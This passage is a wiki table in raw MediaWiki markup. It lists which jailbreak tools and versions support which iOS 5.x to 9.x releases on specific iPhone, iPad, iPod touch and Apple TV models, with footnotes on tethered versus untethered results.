|-
| rowspan="3" | 4.4.3
| rowspan="3" | 5.0.1
| rowspan="2" | [[Seas0nPass]]
| class="rborderplz" | 0.7.9.270 (Mac)
| rowspan="3" {{yes}}
|-
| class="rborderplz" | 0.3.44.???? (Windows)
|-
| colspan="2" | [[unthredeh4il]]
|-
| rowspan="3" | 4.4.4
| rowspan="3" | 5.0.1
| rowspan="2" | [[Seas0nPass]]
| class="rborderplz" | 0.7.9.290 (Mac)
| rowspan="3" {{yes}}
|-
| class="rborderplz" | 0.3.45.4035 (Windows)
|-
| colspan="2" | [[unthredeh4il]]
|-
| rowspan="3" | 5.0
| rowspan="3" | 5.1
| rowspan="2" | [[Seas0nPass]]
| class="rborderplz" | 0.8.3.470 (Mac)
| rowspan="2" {{partial|Tethered}}
|-
| class="rborderplz" | 0.8.3.5592 (Windows)
|-
| colspan="2" | [[unthredeh4il]]
| {{yes}}
|-
| rowspan="4" | 5.0.1
| rowspan="4" | 5.1.1
| [[PwnageTool]]
| class="rborderplz" | 5.1.1<ref group="5.x_atv" name="nogui" />
| {{partial|Tethered}}
|-
| rowspan="2" | [[Seas0nPass]]
| class="rborderplz" | 0.8.4.518 (Mac)
| rowspan="3" {{yes}}
|-
| class="rborderplz" | 0.8.4.6306 (Windows)
|-
| colspan="2" | [[unthredeh4il]]
|-
| rowspan="3" | 5.0.2
| rowspan="3" | 5.1.1
| rowspan="2" | [[Seas0nPass]]
| class="rborderplz" | 0.8.6.565 (Mac)
| rowspan="3" {{yes}}
|-
| class="rborderplz" | 0.8.6.7558 (Windows)
|-
| colspan="2" | [[unthredeh4il]]
|}
<references group="5.x_atv">
<ref name="nogui">No package management GUI.</ref>
</references>

====6.x====
{| class="wikitable"
|-
! rowspan="2" | iOS
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="10" | Device
|-
! [[iPad 2]]
! [[iPad (3rd generation)]]
! [[iPad (4th generation)]]
! [[iPad mini]]
! [[N88AP|iPhone 3GS]]
! [[iPhone 4]]
! [[N94AP|iPhone 4S]]
! [[iPhone 5]]
! [[iPod touch (4th generation)]]
! [[iPod touch (5th generation)]]
|-
| rowspan="4" | 6.0
| [[evasi0n]]
| class="rborderplz" | 1.0-1.5.3
| colspan="10" {{yes}}
|-
| colspan="2" | [[ipwndfu]]
| colspan="4" rowspan="3" {{no}}
| {{yes}}
| colspan="5" {{no}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.15b1<ref group="6.x_i" name="upgradeable-evasi0n" />-0.9.15b3<ref group="6.x_i" name="upgradeable-evasi0n" />
| {{partial|Yes<ref group="6.x_i" name="upgradeable-evasi0n" />}}
| {{partial|Tethered}}
| colspan="2" rowspan="2" {{no}}
| {{partial|Tethered}}
| rowspan="2" {{no}}
|-
| [[sn0wbreeze]]
| class="rborderplz" | 2.9.8-2.9.14
| colspan="2" {{yes}}
| {{yes}}
|-
| rowspan="4" | 6.0.1
| [[evasi0n]]
| class="rborderplz" | 1.0-1.5.3
| colspan="10" {{yes}}
|-
| colspan="2" | [[ipwndfu]]
| colspan="4" rowspan="3" {{no}}
| {{yes}}
| colspan="5" {{no}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.15b1<ref group="6.x_i" name="ipsw-upgradeable-evasi0n" />-0.9.15b3<ref group="6.x_i" name="ipsw-upgradeable-evasi0n" />
| {{partial|Yes<ref group="6.x_i" name="ipsw-upgradeable-evasi0n" />}}
| {{partial|Tethered<ref group="6.x_i" name="ipsw-upgradeable-evasi0n" />}}
| colspan="2" rowspan="2" {{no}}
| {{partial|Tethered<ref group="6.x_i" name="ipsw-upgradeable-evasi0n" />}}
| rowspan="2" {{no}}
|-
| [[sn0wbreeze]]
| class="rborderplz" | 2.9.8-2.9.14
| colspan="2" {{yes}}
| {{yes}}
|-
| 6.0.2
| [[evasi0n]]
| class="rborderplz" | 1.0-1.5.3
| colspan="3" {{n/a}}
| {{yes}}
| colspan="3" {{n/a}}
| {{yes}}
| colspan="2" {{n/a}}
|-
| rowspan="4" | 6.1
| [[evasi0n]]
| class="rborderplz" | 1.0-1.5.3
| colspan="10" {{yes}}
|-
| colspan="2" | [[ipwndfu]]
| colspan="4" rowspan="3" {{no}}
| {{yes}}
| colspan="5" {{no}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.15b1<ref group="6.x_i" name="ipsw-upgradeable-evasi0n" />-0.9.15b3<ref group="6.x_i" name="ipsw-upgradeable-evasi0n" />
| {{partial|Yes<ref group="6.x_i" name="ipsw-upgradeable-evasi0n" />}}
| {{partial|Tethered<ref group="6.x_i" name="ipsw-upgradeable-evasi0n" />}}
| colspan="2" rowspan="2" {{no}}
| {{partial|Tethered<ref group="6.x_i" name="ipsw-upgradeable-evasi0n" />}}
| rowspan="2" {{no}}
|-
| [[sn0wbreeze]]
| class="rborderplz" | 2.9.8-2.9.14
| colspan="2" {{yes}}
| {{yes}}
|-
| 6.1.1
| [[evasi0n]]
| class="rborderplz" | 1.3-1.5.3
| colspan="6" {{n/a}}
| {{yes}}
| colspan="3" {{n/a}}
|-
| rowspan="4" | 6.1.2
| [[evasi0n]]
| class="rborderplz" | 1.4-1.5.3
| colspan="10" {{yes}}
|-
| colspan="2" | [[ipwndfu]]
| colspan="4" rowspan="3" {{no}}
| {{yes}}
| colspan="5" {{no}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.15b1<ref group="6.x_i" name="ipsw-upgradeable-evasi0n" />-0.9.15b3<ref group="6.x_i" name="ipsw-upgradeable-evasi0n" />
| {{partial|Yes<ref group="6.x_i" name="ipsw-upgradeable-evasi0n" />}}
| {{partial|Tethered<ref group="6.x_i" name="ipsw-upgradeable-evasi0n" />}}
| colspan="2" rowspan="2" {{no}}
| {{partial|Tethered<ref group="6.x_i" name="ipsw-upgradeable-evasi0n" />}}
| rowspan="2" {{no}}
|-
| [[sn0wbreeze]]
| class="rborderplz" | 2.9.10-2.9.14
| colspan="2" {{yes}}
| {{yes}}
|-
| rowspan="4" | 6.1.3
| colspan="2" | [[ipwndfu]]
| colspan="4" {{no}}
| {{yes}}
| colspan="5" {{no}}
|-
| [[p0sixspwn]]
| class="rborderplz" | 1.0-1.0.8
| colspan="10" {{yes}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.15b1<ref group="6.x_i" name="ipsw-upgradeable-p0sixspwn" />-0.9.15b3<ref group="6.x_i" name="ipsw-upgradeable-p0sixspwn" />
| colspan="4" rowspan="2" {{no}}
| {{partial|Yes<ref group="6.x_i" name="ipsw-upgradeable-p0sixspwn" />}}
| {{partial|Tethered<ref group="6.x_i" name="ipsw-upgradeable-p0sixspwn" />}}
| colspan="2" rowspan="2" {{no}}
| {{partial|Tethered<ref group="6.x_i" name="ipsw-upgradeable-p0sixspwn" />}}
| rowspan="2" {{no}}
|-
| [[sn0wbreeze]]
| class="rborderplz" | 2.9.14<ref group="6.x_i" name="upgradeable-p0sixspwn" />
| colspan="2" {{partial|Tethered<ref group="6.x_i" name="upgradeable-p0sixspwn" />}}
| {{partial|Tethered<ref group="6.x_i" name="upgradeable-p0sixspwn" />}}
|-
| 6.1.4
| [[p0sixspwn]]
| class="rborderplz" | 1.0-1.0.8
| colspan="7" {{n/a}}
| {{yes}}
| colspan="2" {{n/a}}
|-
| rowspan="2" | 6.1.5
| [[p0sixspwn]]
| class="rborderplz" | 1.0-1.0.8
| colspan="8" rowspan="2" {{n/a}}
| {{yes}}
| rowspan="2" {{n/a}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.15b1<ref group="6.x_i" name="ipsw-upgradeable-p0sixspwn" />-0.9.15b3<ref group="6.x_i" name="ipsw-upgradeable-p0sixspwn" />
| {{partial|Tethered<ref group="6.x_i" name="ipsw-upgradeable-p0sixspwn" />|class=rborderplz}}
|-
| rowspan="3" | 6.1.6
| colspan="2" | [[ipwndfu]]
| rowspan="3" colspan="4" {{n/a}}
| rowspan="2" {{yes}}
| rowspan="3" colspan="3" {{n/a}}
| {{no}}
| rowspan="3" {{n/a}}
|-
| [[p0sixspwn]]
| class="rborderplz" | 1.0.8
| {{yes}}
|-
| [[redsn0w]]
| class="rborderplz" | 0.9.15b1<ref group="6.x_i" name="ipsw-upgradeable-p0sixspwn" />-0.9.15b3<ref group="6.x_i" name="ipsw-upgradeable-p0sixspwn" />
| {{partial|Tethered<ref group="6.x_i" name="ipsw-upgradeable-p0sixspwn" />}}
| {{partial|Tethered|class=rborderplz nobrradiusplz}}<ref group="6.x_i" name="ipsw-upgradeable-p0sixspwn" />
|}
<references group="6.x_i">
<ref name="upgradeable-evasi0n">[[Tethered jailbreak]] on devices not vulnerable to [[0x24000 Segment Overflow]]. Upgradable to [[untethered jailbreak]] via evasi0n Cydia package.</ref>
<ref name="ipsw-upgradeable-evasi0n">[[Tethered jailbreak]] on devices not vulnerable to [[0x24000 Segment Overflow]]. Requires pointing to 6.0 IPSW. Upgradable to [[untethered jailbreak]] via evasi0n Cydia package.</ref>
<ref name="upgradeable-p0sixspwn">[[Tethered jailbreak]] on devices not vulnerable to [[0x24000 Segment Overflow]]. Upgradable to [[untethered jailbreak]] via p0sixspwn Cydia package.</ref>
<ref name="ipsw-upgradeable-p0sixspwn">[[Tethered jailbreak]] on devices not vulnerable to [[0x24000 Segment Overflow]]. Requires pointing to 6.0 IPSW. Upgradable to [[untethered jailbreak]] via p0sixspwn Cydia package.</ref>
</references>

=====Apple TV=====
'''Note''': "Marketing Version" is the version that the Apple TV reports in its "About" screen.
{| class="wikitable"
|-
! rowspan="2" | Marketing Version
! rowspan="2" | iOS Version
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="3" | Device
|-
! [[K66AP|Apple TV (2nd generation)]]
! [[J33AP|Apple TV (3rd generation) (AppleTV3,1)]]
! [[J33IAP|Apple TV (3rd generation) (AppleTV3,2)]]
|-
| rowspan="3" | 5.1
| rowspan="3" | 6.0
| [[evasi0n]]
| 1.0-1.5.3
| {{yes}}
| rowspan="3" {{no}}
| rowspan="3" {{n/a}}
|-
| [[redsn0w]]
| 0.9.15b1
| {{partial|Tethered}}
|-
| [[Seas0nPass]]
| class="rborderplz" | 0.8.?
| {{yes}}
|-
| rowspan="3" | 5.1.1
| rowspan="3" | 6.0.1
| [[evasi0n]]
| 1.0-1.5.3
| {{yes}}
| rowspan="3" {{no}}
| rowspan="3" {{n/a}}
|-
| [[redsn0w]]
| 0.9.15b3<ref group="6.x_atv" name="ipsw" />
| {{partial|Tethered}}
|-
| [[Seas0nPass]]
| class="rborderplz" | 0.8.?
| {{yes}}
|-
| rowspan="4" | 5.2
| rowspan="4" | 6.1
| [[evasi0n]]
| 1.0-1.5.3
| {{yes}}
| rowspan="4" colspan="2" {{no}}
|-
| [[redsn0w]]
| 0.9.15b3<ref group="6.x_atv" name="ipsw" />
| {{partial|Tethered}}
|-
| rowspan="2" | [[Seas0nPass]]
| class="rborderplz" | 0.8.9.655 (Mac)
| rowspan="2" {{yes}}
|-
| class="rborderplz" | 0.8.9.11241 (Windows)
|-
| rowspan="3" | 5.2.1
| rowspan="3" | 6.1.3
| [[redsn0w]]
| 0.9.15b3<ref group="6.x_atv" name="ipsw" />
| {{partial|Tethered}}
| rowspan="3" colspan="2" {{no}}
|-
| [[p0sixspwn]]
| 1.0-1.0.8
| {{yes}}
|-
| [[Seas0nPass]]
| class="rborderplz" | 0.9.?
| {{partial|Tethered}}
|-
| rowspan="3" | 5.3
| rowspan="3" | 6.1.4
| [[redsn0w]]
| 0.9.15b3<ref group="6.x_atv" name="ipsw" />
| {{partial|Tethered}}
| rowspan="3" colspan="2" {{no}}
|-
| [[p0sixspwn]]
| 1.0-1.0.8
| rowspan="2" {{yes}}
|-
| [[Seas0nPass]]
| class="rborderplz" | 0.9.5
|}
<references group="6.x_atv">
<ref name="ipsw">Point at 6.0 IPSW.</ref>
</references>

====7.x====
{| class="wikitable"
|-
! rowspan="2" | iOS
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="12" | Device
|-
! [[iPad 2]]
! [[iPad (3rd generation)]]
! [[iPad (4th generation)]]
! [[iPad Air]]
! [[iPad mini]]
! [[iPad mini 2]]
! [[iPhone 4]]
! [[N94AP|iPhone 4S]]
! [[iPhone 5]]
! [[iPhone 5c]]
! [[iPhone 5s]]
! [[iPod touch (5th generation)]]
|-
| 7.0
| [[evasi0n7]]<ref group="7.x_i" name="offline" />
| class="rborderplz" | 1.0-1.0.7
| colspan="9" {{yes}}
| colspan="2" {{partial|Yes<ref group="7.x_i" name="hexedit" />}}
| {{yes}}
|-
| 7.0.1
| [[evasi0n7]]<ref group="7.x_i" name="offline" />
| class="rborderplz" | 1.0-1.0.7
| colspan="9" {{n/a}}
| colspan="2" {{yes}}
| {{n/a}}
|-
| 7.0.2
| [[evasi0n7]]<ref group="7.x_i" name="offline" />
| class="rborderplz" | 1.0-1.0.7
| colspan="12" {{yes}}
|-
| 7.0.3
| [[evasi0n7]]<ref group="7.x_i" name="offline" />
| class="rborderplz" | 1.0-1.0.7
| colspan="12" {{yes}}
|-
| 7.0.4
| [[evasi0n7]]<ref group="7.x_i" name="offline" />
| class="rborderplz" | 1.0-1.0.7
| colspan="12" {{yes}}
|-
| 7.0.5
| [[evasi0n7]]<ref group="7.x_i" name="offline" />
| class="rborderplz" | 1.0.5-1.0.7
| colspan="9" {{n/a}}
| colspan="2" {{yes}}
| {{n/a}}
|-
| 7.0.6
| [[evasi0n7]]<ref group="7.x_i" name="offline" />
| class="rborderplz" | 1.0.6-1.0.7
| colspan="12" {{yes}}
|-
| rowspan="3" | 7.1
| rowspan="2" | [[Geeksn0w]]
| class="rborderplz" | 2.5-2.8.3<ref group="7.x_i" name="upgradeable-semi" />
| rowspan="2" colspan="6" {{no}}
| {{partial|Tethered}}
| rowspan="2" colspan="5" {{no}}
|-
| class="rborderplz" | 2.9-2.9.1
| {{partial|Semi-Tethered}}
|-
| [[Pangu]]
| class="rborderplz" | 1.0.0-1.2.1
| colspan="12" {{yes}}
|-
| rowspan="2" | 7.1.1
| [[Geeksn0w]]
| class="rborderplz" | 2.9-2.9.1
| colspan="6" {{no}}
| {{partial|Semi-Tethered}}
| colspan="5" {{no}}
|-
| [[Pangu]]
| class="rborderplz" | 1.0.0-1.2.1
| colspan="12" {{yes}}
|-
| rowspan="2" | 7.1.2
| [[Geeksn0w]]
| class="rborderplz" | 2.9-2.9.1
| colspan="6" {{no}}
| {{partial|Semi-Tethered}}
| colspan="5" {{no}}
|-
| [[Pangu]]
| class="rborderplz" | 1.0.0-1.2.1
| colspan="12" {{yes}}
|}
<references group="7.x_i">
<ref name="offline">Due to the jailbreak payload being removed from the evasi0n website, a modified version of evasi0n7 is now required for a successful jailbreak.</ref>
<ref name="hexedit">Build 11A466. Requires a hex edit of [[evasi0n7]] binary. See [https://i.imgur.com/GVQnpig.png this image].</ref>
<ref name="upgradeable-semi">[[Tethered jailbreak]]. "Upgradable" to semi-tethered with "GeekSn0w Semi Untether Payload" (<code>com.blackgeek.geeksn0wsemiuntetherpayload</code>) from [http://geekrepo.beiphone.it geekrepo.beiphone.it].</ref>
</references>

=====Apple TV=====
'''Note''': "Marketing Version" is the version that the Apple TV reports in its "About" screen.
{| class="wikitable"
|-
! rowspan="2" | Marketing Version
! rowspan="2" | iOS Version
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="2" | Device
|-
! [[K66AP|Apple TV (2nd generation)]]
! [[Apple TV (3rd generation)]]
|-
| rowspan="2" | 6.0
| 7.0.1
| colspan="2" | No Tool Available
| colspan="2" {{no}}
|-
| 7.0.2
| colspan="2" | No Tool Available
| colspan="2" {{no}}
|-
| 6.0.1
| 7.0.3
| colspan="2" | No Tool Available
| colspan="2" {{no}}
|-
| rowspan="2" | 6.0.2
| 7.0.4
| colspan="2" | No Tool Available
| colspan="2" {{no}}
|-
| 7.0.6
| colspan="2" | No Tool Available
| colspan="2" {{no}}
|-
| 6.1
| 7.1
| colspan="2" | No Tool Available
| colspan="2" {{no}}
|-
| 6.1.1
| 7.1.1
| colspan="2" | No Tool Available
| colspan="2" {{no}}
|-
| 6.2
| rowspan="2" | 7.1.2
| colspan="2" | No Tool Available
| colspan="2" {{no}}
|-
| 6.2.1
| Seas0nPass
| 0.9.7 beta
| {{partial|Tethered}}
| {{no}}
|}

====8.x====
{| class="wikitable"
|-
! rowspan="2" | iOS
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="16" | Device
|-
! [[iPad 2]]
! [[iPad (3rd generation)]]
! [[iPad (4th generation)]]
! [[iPad Air]]
! [[iPad Air 2]]
! [[iPad mini]]
! [[iPad mini 2]]
! [[iPad mini 3]]
! [[N94AP|iPhone 4S]]
! [[iPhone 5]]
! [[iPhone 5c]]
! [[iPhone 5s]]
! [[N61AP|iPhone 6]]
! [[N56AP|iPhone 6 Plus]]
! [[iPod touch (5th generation)]]
! [[N102AP|iPod touch (6th generation)]]
|-
| rowspan="4" | 8.0
| rowspan="2" | [[Pangu8]]
| class="rborderplz" | 1.0.0-1.2.1<ref group="8.x_i" name="ssh" /> (Windows)
| rowspan="4" colspan="4" {{yes}}
| rowspan="4" {{n/a}}
| rowspan="4" colspan="2" {{yes}}
| rowspan="4" {{partial}}<ref group="8.x_i" name="ipad-wifi" />
| rowspan="4" colspan="7" {{yes}}
| rowspan="4" {{n/a}}
|-
| class="rborderplz" | 1.0.0 (Mac)
|-
| [[PPJailbreak]]
| class="rborderplz" | 1.0 (Mac)
|-
| [[TaiG]]
| class="rborderplz" | 1.0.0-1.2.1 (Windows)
|-
| rowspan="4" | 8.0.1
| rowspan="2" | [[Pangu8]]
| class="rborderplz" | 1.0.0-1.2.1<ref group="8.x_i" name="ssh" /> (Windows)
| rowspan="4" colspan="4" {{yes}}
| rowspan="4" {{n/a}}
| rowspan="4" colspan="2" {{yes}}
| rowspan="4" {{partial}}<ref group="8.x_i" name="ipad-wifi" />
| rowspan="4" colspan="7" {{yes}}
| rowspan="4" {{n/a}}
|-
| class="rborderplz" | 1.0.0 (Mac)
|-
| [[PPJailbreak]]
| class="rborderplz" | 1.0 (Mac)
|-
| [[TaiG]]
| class="rborderplz" | 1.0.0-1.2.1 (Windows)
|-
| rowspan="4" | 8.0.2
| rowspan="2" | [[Pangu8]]
| class="rborderplz" | 1.0.0-1.2.1<ref group="8.x_i" name="ssh" /> (Windows)
| rowspan="4" colspan="4" {{yes}}
| rowspan="4" {{n/a}}
| rowspan="4" colspan="2" {{yes}}
| rowspan="4" {{partial}}<ref group="8.x_i" name="ipad-wifi" />
| rowspan="4" colspan="7" {{yes}}
| rowspan="4" {{n/a}}
|-
| class="rborderplz" | 1.0.0 (Mac)
|-
| [[PPJailbreak]]
| class="rborderplz" | 1.0 (Mac)
|-
| [[TaiG]]
| class="rborderplz" | 1.0.0-1.2.1 (Windows)
|-
| rowspan="4" | 8.1
| rowspan="2" | [[Pangu8]]
| class="rborderplz" | 1.0.0-1.2.1<ref group="8.x_i" name="ssh" /> (Windows)
| rowspan="4" colspan="15" {{yes}}
| rowspan="4" {{n/a}}
|-
| class="rborderplz" | 1.0.0 (Mac)
|-
| [[PPJailbreak]]
| class="rborderplz" | 1.0 (Mac)
|-
| [[TaiG]]
| class="rborderplz" | 1.0.0-1.2.1 (Windows)
|-
| rowspan="2" | 8.1.1
| [[PPJailbreak]]
| class="rborderplz" | 1.0 (Mac)
| rowspan="2" colspan="15" {{yes}}
| rowspan="2" {{n/a}}
|-
| [[TaiG]]
| class="rborderplz" | 1.0.0-1.2.1 (Windows)
|-
| rowspan="2" | 8.1.2
| [[PPJailbreak]]
| class="rborderplz" | 1.0 (Mac)
| rowspan="2" colspan="15" {{yes}}
| rowspan="2" {{n/a}}
|-
| [[TaiG]]
| class="rborderplz" | 1.2.0-1.2.1 (Windows)
|-
| rowspan="3" | 8.1.3
| [[PPJailbreak]]
| 2.0.0 (Mac)
| rowspan="3" colspan="15" {{yes}}
| rowspan="3" {{n/a}}
|-
| rowspan="2" | [[TaiG]]
| class="rborderplz" | 2.2.0-2.4.5 (Windows)
|-
| class="rborderplz" | 1.0.0-1.1.0 (Mac)
|-
| rowspan="3" | 8.2
| [[PPJailbreak]]
| 2.0.0 (Mac)
| rowspan="3" colspan="15" {{yes}}
| rowspan="3" {{n/a}}
|-
| rowspan="2" | [[TaiG]]
| class="rborderplz" | 2.2.0-2.4.5 (Windows)
|-
| class="rborderplz" | 1.0.0-1.1.0 (Mac)
|-
| rowspan="3" | 8.3
| [[PPJailbreak]]
| 2.0.0 (Mac)
| rowspan="3" colspan="15" {{yes}}
| rowspan="3" {{n/a}}
|-
| rowspan="2" | [[TaiG]]
| class="rborderplz" | 2.2.0-2.4.5 (Windows)
|-
| class="rborderplz" | 1.0.0-1.1.0 (Mac)
|-
| rowspan="3" | 8.4
| [[PPJailbreak]]
| 2.0.0 (Mac)
| rowspan="3" colspan="16" {{yes}}
|-
| rowspan="2" | [[TaiG]]
| class="rborderplz" | 2.2.0-2.4.5 (Windows)
|-
| class="rborderplz" | 1.0.0-1.1.0 (Mac)
|-
| rowspan="3" | 8.4.1
| rowspan="2" | [[EtasonJB]]
| RC2
| colspan="2" rowspan="2" {{yes}}
| {{no}}
| rowspan="2" colspan="2" {{no}}
| rowspan="2" {{yes}}
| rowspan="2" colspan="2" {{no}}
| {{yes}}
| {{no}}
| {{yes}}
| colspan="3" rowspan="2" {{no}}
| rowspan="2" {{yes}}
| rowspan="2" {{no}}
|-
| RC3-RC5
| {{yes}}
| colspan="3" {{yes}}
|-
| [[Home Depot]]
| 1.1 beta 1
| colspan="2" {{yes}}
| colspan="3" {{no}}
| {{yes}}
| colspan="2" {{no}}
| {{yes}}
| colspan="5" {{no}}
| {{yes}}
| {{no}}
|}
<references group="8.x_i">
<ref name="ssh">1.0.0 and 1.0.1 give SSH access only ([[Cydia]] is not installed).</ref>
<ref name="ipad-wifi">[[J85mAP|iPad4,7 (Wi-Fi)]] only.</ref>
</references>

=====Apple TV=====
'''Note''': "Marketing Version" is the version that the Apple TV reports in its "About" screen.
{| class="wikitable"
|-
! rowspan="2" | Marketing Version
! rowspan="2" | iOS Version
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! Device
|-
! [[J33AP|Apple TV (3rd generation)]]
|-
| 7.0
| 8.0
| colspan="2" | No Tool Available
| {{no}}
|-
| 7.0.1
| 8.1
| colspan="2" | No Tool Available
| {{no}}
|-
| 7.0.2
| 8.1.1
| colspan="2" | No Tool Available
| {{no}}
|-
| 7.0.3
| 8.1.3
| colspan="2" | No Tool Available
| {{no}}
|-
| 7.1
| 8.2
| colspan="2" | No Tool Available
| {{no}}
|-
| 7.2
| 8.3
| colspan="2" | No Tool Available
| {{no}}
|-
| 7.2.1
| 8.4.1
| colspan="2" | No Tool Available
| {{no}}
|-
| 7.2.2
| rowspan="3" | 8.4.2
| colspan="2" | No Tool Available
| {{no}}
|-
| 7.3
| colspan="2" | No Tool Available
| {{no}}
|-
| 7.3.1
| colspan="2" | No Tool Available
| {{no}}
|-
| 7.4
| 8.4.3
| [[EtasonATV]]
| RC1
| {{yes}}
|-
| 7.5
| 8.4.4
| colspan="2" | No Tool Available
| {{no}}
|}

====9.x====
{| class="wikitable"
|-
! rowspan="2" | iOS
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="22" | Device
|-
! [[iPad 2]]
! [[iPad (3rd generation)]]
! [[iPad (4th generation)]]
! [[iPad Air]]
! [[iPad Air 2]]
! [[iPad Pro (12.9-inch)]]
! [[iPad Pro (9.7-inch)]]
! [[iPad mini]]
! [[iPad mini 2]]
! [[iPad mini 3]]
! [[iPad mini 4]]
! [[N94AP|iPhone 4S]]
! [[iPhone 5]]
! [[iPhone 5c]]
! [[iPhone 5s]]
! [[N61AP|iPhone 6]]
! [[N56AP|iPhone 6 Plus]]
! [[iPhone 6s]]
! [[iPhone 6s Plus]]
! [[iPhone SE (1st generation)]]
! [[iPod touch (5th generation)]]
! [[N102AP|iPod touch (6th generation)]]
|-
| rowspan="2" | 9.0
| rowspan="2" | [[Pangu9]] for 9.0-9.1
| 1.0.0-1.3.2 (Windows)
| colspan="6" rowspan="2" {{yes}}
| rowspan="2" {{n/a}}
| colspan="12" rowspan="2" {{yes}}
| rowspan="2" {{n/a}}
| colspan="2" rowspan="2" {{yes}}
|-
| 1.0.0-1.1.1 (Mac)
|-
| rowspan="2" | 9.0.1
| rowspan="2" | [[Pangu9]] for 9.0-9.1
| 1.0.0-1.3.2 (Windows)
| colspan="6" rowspan="2" {{yes}}
| rowspan="2" {{n/a}}
| colspan="12" rowspan="2" {{yes}}
| rowspan="2" {{n/a}}
| colspan="2" rowspan="2" {{yes}}
|-
| 1.0.0-1.1.1 (Mac)
|-
| rowspan="2" | 9.0.2
| rowspan="2" | [[Pangu9]] for 9.0-9.1
| 1.0.0-1.3.2 (Windows)
| colspan="6" rowspan="2" {{yes}}
| rowspan="2" {{n/a}}
| colspan="12" rowspan="2" {{yes}}
| rowspan="2" {{n/a}}
| colspan="2" rowspan="2" {{yes}}
|-
| 1.0.0-1.1.1 (Mac)
|-
| rowspan="5" | 9.1
| rowspan="2" | [[Home Depot]]
| Rev 1 - Rev 7
| {{yes}}
| colspan="5" {{no}}
| rowspan="5" {{n/a}}
| colspan="5" {{no}}
| {{partial|Partial<ref group="9.x" name="iphone52" />}}
| colspan="6" {{no}}
| rowspan="5" {{n/a}}
| {{yes}}
| {{no}}
|-
| RC1-RC3
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="3" {{no}}
| rowspan="2" {{yes}}
| rowspan="2" colspan="3" {{no}}
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="5" {{no}}
| rowspan="2" {{yes}}
| rowspan="2" {{no}}
|-
| colspan="2" | [[JailbreakMe 4.0]]
|-
| rowspan="2" | [[Pangu9]] for 9.0-9.1
| 1.3.0-1.3.2 (Windows)
| colspan="3" rowspan="2" {{no}}
| colspan="3" rowspan="2" {{yes}}
| rowspan="2" {{no}}
| colspan="3" rowspan="2" {{yes}}
| colspan="3" rowspan="2" {{no}}
| colspan="5" rowspan="2" {{yes}}
| rowspan="2" {{no}}
| rowspan="2" {{yes}}
|-
| 1.1.0-1.1.1 (Mac)
|-
| rowspan="4" | 9.2
| rowspan="2" | [[Home Depot]]
| Rev 1 - Rev 7
| {{yes}}
| colspan="5" {{no}}
| rowspan="4" {{n/a}}
| colspan="4" {{no}}
| {{yes}}
| {{partial|Partial<ref group="9.x" name="iphone52" />}}
| colspan="6" {{no}}
| rowspan="4" {{n/a}}
| colspan="2" {{no}}
|-
| RC1-RC3
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="3" {{no}}
| rowspan="2" {{yes}}
| rowspan="2" colspan="3" {{no}}
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="5" {{no}}
| rowspan="2" {{yes}}
| rowspan="2" {{no}}
|-
| colspan="2" | [[JailbreakMe 4.0]]
|-
| [[Pangu9]] for 9.2-9.3.3
| 1.0.0-1.1.0
| colspan="3" {{no}}
| colspan="3" {{yes}}
| {{no}}
| colspan="3" {{yes}}
| colspan="3" {{no}}
| colspan="5" {{yes}}
| {{no}}
| {{yes}}
|-
| rowspan="4" | 9.2.1
| rowspan="2" | [[Home Depot]]
| Rev 1 - Rev 7
| {{yes}}
| {{no}}
| {{yes}}
| colspan="3" {{no}}
| rowspan="4" {{n/a}}
| {{partial|Partial<ref group="9.x" name="ipad25" />}}
| colspan="3" {{no}}
| {{yes}}
| {{partial|Partial<ref group="9.x" name="iphone52" />}}
| {{partial|Partial<ref group="9.x" name="iphone53" />}}
| colspan="5" {{no}}
| rowspan="4" {{n/a}}
| colspan="2" {{no}}
|-
| RC1-RC3
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="3" {{no}}
| rowspan="2" {{yes}}
| rowspan="2" colspan="3" {{no}}
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="5" {{no}}
| rowspan="2" {{yes}}
| rowspan="2" {{no}}
|-
| colspan="2" | [[JailbreakMe 4.0]]
|-
| [[Pangu9]] for 9.2-9.3.3
| 1.0.0-1.1.0
| colspan="3" {{no}}
| colspan="3" {{yes}}
| {{no}}
| colspan="3" {{yes}}
| colspan="3" {{no}}
| colspan="5" {{yes}}
| {{no}}
| {{yes}}
|-
| rowspan="4" | 9.3
| rowspan="2" | [[Home Depot]]
| Rev 1 - Rev 7
| {{yes}}
| colspan="10" {{no}}
| {{yes}}
| colspan="10" {{no}}
|-
| RC1-RC3
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="4" {{no}}
| rowspan="2" {{yes}}
| rowspan="2" colspan="3" {{no}}
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="6" {{no}}
| rowspan="2" {{yes}}
| rowspan="2" {{no}}
|-
| colspan="2" | [[JailbreakMe 4.0]]
|-
| [[Pangu9]] for 9.2-9.3.3
| 1.0.0-1.1.0
| colspan="3" {{no}}
| colspan="4" {{yes}}
| {{no}}
| colspan="3" {{yes}}
| colspan="3" {{no}}
| colspan="6" {{yes}}
| {{no}}
| {{yes}}
|-
| rowspan="4" | 9.3.1
| rowspan="2" | [[Home Depot]]
| Rev 1 - Rev 7
| {{yes}}
| {{partial|Partial<ref group="9.x" name="ipad32" />}}
| colspan="9" {{no}}
| {{yes}}
| colspan="10" {{no}}
|-
| RC1-RC3
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="4" {{no}}
| rowspan="2" {{yes}}
| rowspan="2" colspan="3" {{no}}
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="6" {{no}}
